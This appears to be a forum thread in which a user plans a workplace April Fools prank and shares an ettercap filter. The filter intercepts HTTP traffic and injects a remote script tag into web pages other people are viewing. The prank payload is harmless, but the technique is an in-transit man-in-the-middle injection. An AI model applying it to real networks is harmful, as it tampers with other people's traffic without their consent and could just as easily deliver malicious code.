Woodstriker

Hey all, I'm still working on the April fools project and I'm coming across some problems. I haven't used ettercap much so go easy on me. Here is the filter I create: if (ip.proto == TCP &amp;&amp; tcp.src == 80) { if (search(DATA.data, "\&lt;/body")) { replace("\&lt;/body", "\&lt;script src="http://cornify.com/js/cornify.js"\&gt;\&lt;/script\&gt;\&lt;script\&gt;setInterval("cornify_add()", 2000)\&lt;/script\&gt;\&lt;/body"); msg("Script injected.\n"); } } I'm not sure if they are needed but I put backslashes in front of all <'s because the filter didn't seem to work without them. Anyway, this works fine on some pages, but if there are any advertisements, it gives me "SEND L3 ERROR: 1514 byte packet (0800:06)". I know advertisements are wrapped in body tags as well, but I'm not sure what the error means. Is the packet too large after adding all that text to it? I'm sure there's a better way of adding the script but I'm still a noob at this stuff. Any ideas would be appreciated! -Wood

Sorry for the double post but I have a question about the ettercap filter. I got the custom filter working but it only works on some pages. It seems that any time it goes to load an ad I get the following error in ettercap: SEND L3 ERROR: 1514 byte packet (0800:06) Right now I have it replacing the </body> with a </body> along with the script before it. Is using the </body> tag a bad idea or is there a way to avoid touching advertisement packets?

Correct me if I'm wrong, but I believe if you are on a VLAN that can communicate with all other VLANs or if you're on a VLAN trunk you would be able to see all traffic. If you're on a VLAN that cannot communicate with any other VLANs then you would have an issue. Either way, I'm only affecting one VLAN on my network so it's not a problem for me.

Awesome, thanks for the link man. I have the script I want to run and now I just have to figure out how to inject it! I think I'll try this on an unsuspecting friend first

Well people aren't really supposed to be surfing the web unless it relates directly to work, which is usually not the case. I'm still going to run it by them, but I have a feeling they will like my idea. I just don't know how to go about doing it . The Ettercap method sounds quick but I've never used that before.

I'm not going to do it all day, just for about a minute or so during the day some time. It's a pretty laid back environment so I doubt they will get mad. I'm half in charge of the network which is why I have access to everything.

Hey all, I'm looking to play a little prank on everyone at my work on April 1st. I would like to set it up so that any page they visit will gradually become cornified. I don't know how to set it up but I have access to everything on the network. This is just an idea and I have no idea if it would work or how to make it work but maybe it will spark some discussion. I was thinking I could make it so all web page requests get redirected to a page I set up which could nest their request inside. Then have that page run a script to cornify every minute or so. Is that possible or do I not know what I'm talking about? Wood